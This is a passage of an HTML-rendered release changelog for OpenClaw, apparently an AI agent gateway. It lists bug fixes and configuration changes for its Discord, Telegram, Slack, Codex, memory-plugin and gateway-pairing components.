<li>Discord: normalize prefixed channel targets only at the thread-binding API boundary, so <code>sessions_spawn({ runtime: "acp", thread: true })</code> can create child threads from Discord channels without breaking current-channel ACP bindings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4280999983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68034" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68034/hovercard" href="https://github.com/openclaw/openclaw/pull/68034">#68034</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zetarcos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zetarcos">@Zetarcos</a>.</li>
<li>Discord: harden inbound thread metadata handling against partial Carbon channel getters, so non-command thread messages and queued jobs no longer crash when <code>name</code>, <code>parentId</code>, <code>parent</code>, or <code>ownerId</code> requires fetched raw data.</li>
<li>Discord: let <code>message</code> tool reactions resolve <code>user:&lt;id&gt;</code> DM targets and preserve <code>channels.discord.guilds.&lt;guild&gt;.channels.&lt;channel&gt;.requireMention: false</code> during reply-stage activation fallback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308926174" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70165" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70165/hovercard" href="https://github.com/openclaw/openclaw/issues/70165">#70165</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298063491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69441" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69441/hovercard" href="https://github.com/openclaw/openclaw/issues/69441">#69441</a>.</li>
<li>Plugins/startup: pre-normalize and cache Jiti alias maps before creating plugin loaders, so module-scoped loader filenames do not reintroduce per-plugin alias-normalization startup cost. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309329893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70186" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70186/hovercard" href="https://github.com/openclaw/openclaw/issues/70186">#70186</a>.</li>
<li>ACP/Codex: run the bundled Codex ACP harness with an isolated <code>CODEX_HOME</code> and avoid writing incomplete ChatGPT auth bridge files, so Codex ACP sessions no longer clobber the user's real Codex CLI auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310119335" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70234" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70234/hovercard" href="https://github.com/openclaw/openclaw/issues/70234">#70234</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lonobers88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lonobers88">@Lonobers88</a>.</li>
<li>Gateway/client: keep long-running RPCs such as ACP <code>agent.wait</code> calls in charge of their own timeout instead of closing the websocket on a missed app-level tick while work is still pending.</li>
<li>Telegram/webhooks: lower the grammY webhook callback timeout to 5s so Telegram gets an early 200 response instead of retrying long-running updates as read timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308661431" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70146" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70146/hovercard" href="https://github.com/openclaw/openclaw/pull/70146">#70146</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/friday-james/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/friday-james">@friday-james</a>.</li>
<li>Telegram/polling: rebuild the polling HTTP transport after <code>getUpdates</code> 409 conflicts, so retries use a fresh TCP connection instead of looping on a Telegram-terminated keep-alive socket. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305891332" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69873/hovercard" href="https://github.com/openclaw/openclaw/pull/69873">#69873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Media delivery: strip persisted base64 audio payloads from webchat history, resolve stored <code>media://inbound/*</code> attachments before local-root checks, suppress duplicate Telegram voice/audio sends when TTS emits the same media twice, and support custom image-model IDs that already include their provider prefix.</li>
<li>Slack/files: resolve <code>downloadFile</code> bot tokens from the runtime config when callers provide <code>cfg</code> without an explicit token or prebuilt client, preserving cfg-only file downloads outside the action runtime path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308873958" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70160/hovercard" href="https://github.com/openclaw/openclaw/pull/70160">#70160</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Slack/HTTP: dispatch registered Request URL webhooks through the same handler registry used by Slack monitor setup, so HTTP-mode Slack events no longer 404 after successful route registration. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310578533" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70275" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70275/hovercard" href="https://github.com/openclaw/openclaw/pull/70275">#70275</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FroeMic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FroeMic">@FroeMic</a>.</li>
<li>Slack/runtime bindings: route focused Slack thread replies through their bound ACP session instead of preparing replies against the default agent shell. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277025346" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67739" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67739/hovercard" href="https://github.com/openclaw/openclaw/issues/67739">#67739</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Frankla20/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Frankla20">@Frankla20</a>.</li>
<li>CLI/Claude: keep stored Claude CLI sessions through OAuth refresh-token rotation by keying auth epochs on stable account identity instead of mutable OAuth token material. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313209734" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70452" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70452/hovercard" href="https://github.com/openclaw/openclaw/pull/70452">#70452</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>CLI/Claude: verify stored Claude CLI session ids have a readable project transcript before resuming, clearing phantom bindings with <code>reason=transcript-missing</code> instead of silently starting fresh under <code>--resume</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309189442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70177" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70177/hovercard" href="https://github.com/openclaw/openclaw/issues/70177">#70177</a>.</li>
<li>CLI sessions: persist CLI session clearing through the atomic session-store merge path, so expired Claude/Codex CLI bindings are actually removed before retrying without the stale session id. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310973933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70298" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70298/hovercard" href="https://github.com/openclaw/openclaw/pull/70298">#70298</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HFConsultant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HFConsultant">@HFConsultant</a>.</li>
<li>ACP/sessions_spawn: honor explicit <code>model</code> overrides for ACP child sessions instead of silently falling back to the target agent default model. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309662124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70210" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70210/hovercard" href="https://github.com/openclaw/openclaw/pull/70210">#70210</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/felix-miao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/felix-miao">@felix-miao</a>.</li>
<li>Diffs/viewer: re-read remote viewer access policy from live runtime config on each request, so toggling <code>plugins.entries.diffs.config.security.allowRemoteViewer</code> closes proxied viewer access immediately instead of waiting for a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diffs/tooling: re-read <code>viewerBaseUrl</code>, presentation defaults, and viewer access policy from live runtime config, and fail closed when the live <code>diffs</code> plugin entry disappears instead of reviving startup viewer settings. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Memory/LanceDB: stop resurrecting removed live <code>memory-lancedb</code> hook config from startup snapshots, so deleting or disabling the plugin entry shuts off auto-recall and auto-capture without a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Memory/LanceDB: keep auto-recall and auto-capture hooks wired when those settings start disabled, so turning them on in live config starts recall and capture without waiting for a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Skill Workshop: keep the tool plus <code>before_prompt_build</code> / <code>agent_end</code> hooks wired while the plugin is disabled at startup, so turning the plugin back on in live config starts guidance and capture without waiting for a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory: stop reviving removed live <code>active-memory</code> config from startup snapshots, so removing the plugin entry turns the hook off immediately instead of waiting for a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>GitHub Copilot: re-read plugin discovery config from the live runtime snapshot, so toggling <code>plugins.entries.github-copilot.config.discovery.enabled</code> takes effect without a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Ollama: re-read plugin discovery config from the live runtime snapshot, so toggling <code>plugins.entries.ollama.config.discovery.enabled</code> takes effect without a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>OpenAI: re-read the plugin prompt-overlay personality from live runtime config, so GPT-5 system prompt contributions update without a restart when <code>plugins.entries.openai.config.personality</code> changes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Amazon Bedrock: re-read live discovery and guardrail plugin config, so toggling <code>plugins.entries.amazon-bedrock.config.discovery</code> or <code>plugins.entries.amazon-bedrock.config.guardrail</code> takes effect without a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex: re-read the plugin discovery config from the live runtime snapshot, so toggling <code>plugins.entries.codex.config.discovery</code> takes effect without a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/subagents: drop bare <code>NO_REPLY</code> from the parent turn when the session still has pending spawned children, so direct-conversation surfaces such as Telegram DMs no longer rewrite the sentinel into visible fallback chatter while waiting for the child completion event. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306323538" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69942" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69942/hovercard" href="https://github.com/openclaw/openclaw/pull/69942">#69942</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Plugins/install: keep bundled plugin dependencies off npm install while repairing them when plugins activate from a packaged install, including Feishu/Lark, Browser, and direct bundled channel setup-entry loads.</li>
<li>CLI/channels: skip and cache bundled channel plugin, setup, and secrets load failures during read-only discovery, so one broken unused bundled channel cannot crash <code>openclaw status</code> or bootstrap secret scans.</li>
<li>Memory/LanceDB: retry initialization after a failed LanceDB load and report unsupported Intel macOS native runtime clearly instead of caching the failure or repeatedly attempting an install that cannot work.</li>
<li>CLI/Claude: hash only static extra system prompt parts when deciding whether to reuse a CLI session, so per-message inbound metadata no longer resets Claude CLI conversations on every turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308322648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70122" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70122/hovercard" href="https://github.com/openclaw/openclaw/pull/70122">#70122</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zijunl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zijunl">@zijunl</a>.</li>
<li>Hooks/Slack: standardize shared message hook routing fields (<code>threadId</code> / <code>replyToId</code>) and stop Slack outbound delivery from re-running <code>message_sending</code> inside the channel adapter, so plugins like thread-ownership make one outbound routing decision per reply. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Auto-reply/media: share one run-scoped reply media context between streamed block delivery and final payload filtering, so a local <code>MEDIA:</code> attachment is staged once and duplicate media sends are suppressed reliably. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4282588387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68111/hovercard" href="https://github.com/openclaw/openclaw/pull/68111">#68111</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ayeshakhalid192007-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ayeshakhalid192007-dev">@ayeshakhalid192007-dev</a>.</li>
<li>Plugins/gateway hooks: expose startup config, workspace dir, and a live cron getter on the typed <code>gateway_start</code> hook, and move memory-core managed dreaming off the internal <code>gateway:startup</code> bridge so cron reconciliation stays on the public plugin hook path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/config: read plugin trust decisions from the source config snapshot when a resolved runtime snapshot is active, so <code>plugins.allow</code> remains enforced and <code>doctor</code>/gateway startup no longer warn that the allowlist is empty when it is configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308880566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70161" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70161/hovercard" href="https://github.com/openclaw/openclaw/issues/70161">#70161</a>. Also fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308625851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70141" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70141/hovercard" href="https://github.com/openclaw/openclaw/issues/70141">#70141</a>.</li>
<li>Agents/openai-completions: enable malformed streamed tool-call argument repair for self-hosted OpenAI-compatible backends such as Kimi/SGLang, so fragmented tool-call arguments no longer reach tools as empty or unusable objects. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4301818698" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69672" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69672/hovercard" href="https://github.com/openclaw/openclaw/issues/69672">#69672</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310912363" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70294" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70294/hovercard" href="https://github.com/openclaw/openclaw/pull/70294">#70294</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MonkeyLeeT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MonkeyLeeT">@MonkeyLeeT</a>.</li>
<li>Gateway/restart: preserve group and channel chat context when resuming an agent turn after a Gateway restart, so continuation replies keep the same prompt, routing, and tool-status behavior as the original conversation.</li>
<li>Gateway/pairing: shared-secret loopback CLI clients now silently auto-approve <code>metadata-upgrade</code> pairing (platform / device family refresh) instead of being disconnected with <code>1008 pairing required</code>. This matches the scope-upgrade and role-upgrade behavior added in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297898125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69431/hovercard" href="https://github.com/openclaw/openclaw/pull/69431">#69431</a> and unblocks non-interactive CLI automation when a paired-device record has a stale platform string (e.g. device key replicated across hosts, install migrated between OSes, or platform-string format changed between OpenClaw versions). Browser / Control-UI clients keep the existing approval-required flow for metadata changes.</li>
<li>Gateway/pairing: treat any forwarded-header evidence (<code>Forwarded</code>, <code>X-Forwarded-*</code>, or <code>X-Real-IP</code>) as proxied WebSocket traffic before pairing locality checks, so reverse-proxy topologies cannot use the loopback shared-secret helper auto-pairing path.</li>
<li>Agents/OpenAI: treat exact <code>NO_REPLY</code> assistant output as a deliberate silent reply in embedded runs, so GPT-5.4 turns with signed reasoning plus a silent final no longer surface a false incomplete-turn error.</li>
<li>Auto-reply/streaming: preserve streamed reply directives through chunk boundaries and phase-aware <code>final_answer</code> delivery, so split <code>MEDIA:&lt;path&gt;</code> lines, voice tags, and reply targets reach channel delivery instead of leaking as text or being dropped. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310186986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70243" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70243/hovercard" href="https://github.com/openclaw/openclaw/pull/70243">#70243</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>Anthropic/Claude Opus 4.7: normalize Opus 4.7 and <code>claude-cli</code> Opus 4.7 variants to a 1M context window in resolved runtime metadata and active-agent status/context reporting, so they no longer inherit the stale 200k fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Gateway/pairing webchat: render <code>/pair qr</code> replies as structured media instead of raw markdown text, preserve inline reply threading and silent-control handling on media replies, avoid persisting sensitive QR images into transcript history, and keep local webchat media embedding behind internal-only trust markers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307431693" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70047" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70047/hovercard" href="https://github.com/openclaw/openclaw/pull/70047">#70047</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Codex harness: default app-server runs to unchained local execution, so OpenAI heartbeats can use network and shell tools without stalling behind native Codex approvals or the workspace-write sandbox.</li>
<li>Codex harness: fail closed for unknown native app-server approval methods instead of routing unsupported future approval shapes through OpenClaw approval grants. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312047678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70356" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70356/hovercard" href="https://github.com/openclaw/openclaw/pull/70356">#70356</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Codex harness: apply the GPT-5 behavior and heartbeat prompt overlay to native Codex app-server runs, so <code>codex/gpt-5.x</code> sessions get the same follow-through, tool-use, and proactive heartbeat guidance as OpenAI GPT-5 runs.</li>
<li>Codex harness: add an explicit Guardian mode for Codex app-server approvals, plus a Docker live probe for approved and ask-back Guardian decisions, while keeping default app-server runs unchained for unattended local heartbeats. The legacy <code>OPENCLAW_CODEX_APP_SERVER_GUARDIAN</code> shortcut is removed; use plugin config <code>appServer.mode: "guardian"</code> or <code>OPENCLAW_CODEX_APP_SERVER_MODE=guardian</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>OpenAI/Responses: keep embedded OpenAI Responses runs on HTTP when <code>models.providers.openai.baseUrl</code> points at a local mock or other non-public endpoint, so mocked/custom endpoints no longer drift onto the hardcoded public websocket transport. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304655972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69815" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69815/hovercard" href="https://github.com/openclaw/openclaw/pull/69815">#69815</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/config: require resolved runtime config on channel send/action/client helpers and block runtime helper <code>loadConfig()</code> calls, so SecretRefs are resolved at startup/boundaries instead of being re-read during sends.</li>
<li>Discord: pass resolved runtime config through guild and moderation action helpers, so thread-originated Discord commands can run channel, member, role, and guild actions without falling back to runtime config reads. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309729121" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70215" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70215/hovercard" href="https://github.com/openclaw/openclaw/pull/70215">#70215</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/szponeczek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/szponeczek">@szponeczek</a>.</li>
<li>CLI/channels: preserve bundled setup promotion metadata when a loaded partial channel plugin omits it, so adding a non-default account still moves legacy single-account fields such as Telegram <code>streaming</code> into <code>accounts.default</code>.</li>
<li>Telegram: keep the sent-message ownership cache isolated per configured session store, so own-message reaction filtering remains correct with custom <code>session.store</code> paths.</li>
<li>Security/update: fail closed when exact pinned npm plugin or hook-pack updates detect integrity drift, and expose aborted plugin drift details in <code>openclaw update --json</code>.</li>
<li>Ollama: forward OpenClaw thinking control to native <code>/api/chat</code> requests as top-level <code>think</code>, so <code>/think off</code> and <code>openclaw agent --thinking off</code> suppress thinking on models such as qwen3 instead of idling until the watchdog fires. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306071287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69902" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69902/hovercard" href="https://github.com/openclaw/openclaw/issues/69902">#69902</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306563588" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69967" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69967/hovercard" href="https://github.com/openclaw/openclaw/pull/69967">#69967</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WZH8898/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WZH8898">@WZH8898</a>.</li>
<li>Memory-core/dreaming: suppress the startup-only managed dreaming cron unavailable warning when the cron service is still attaching, while preserving the runtime warning if cron genuinely remains unavailable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306280013" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69939" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69939/hovercard" href="https://github.com/openclaw/openclaw/issues/69939">#69939</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306318830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69941" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69941/hovercard" href="https://github.com/openclaw/openclaw/pull/69941">#69941</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Mattermost: suppress reasoning-only payloads even when they arrive as blockquoted <code>&gt; Reasoning:</code> text, preventing <code>/reasoning on</code> from leaking thinking into channel posts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306227367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69927" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69927/hovercard" href="https://github.com/openclaw/openclaw/pull/69927">#69927</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lawrence3699/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lawrence3699">@lawrence3699</a>.</li>
<li>Discord: read <code>channel.parentId</code> through a safe accessor in the slash-command, reaction, and model-picker paths so partial <code>GuildThreadChannel</code> prototype getters no longer throw <code>Cannot access rawData on partial Channel</code> when commands like <code>/new</code> run from inside a thread. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305746096" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69861" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69861/hovercard" href="https://github.com/openclaw/openclaw/issues/69861">#69861</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306108830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69908" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69908/hovercard" href="https://github.com/openclaw/openclaw/pull/69908">#69908</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Discord: use safe channel name and parent accessors across voice command authorization, so <code>/vc</code> commands from partial Discord thread channels no longer crash on Carbon rawData getters. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309500857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70199" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70199/hovercard" href="https://github.com/openclaw/openclaw/pull/70199">#70199</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanamizuki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanamizuki">@hanamizuki</a>.</li>
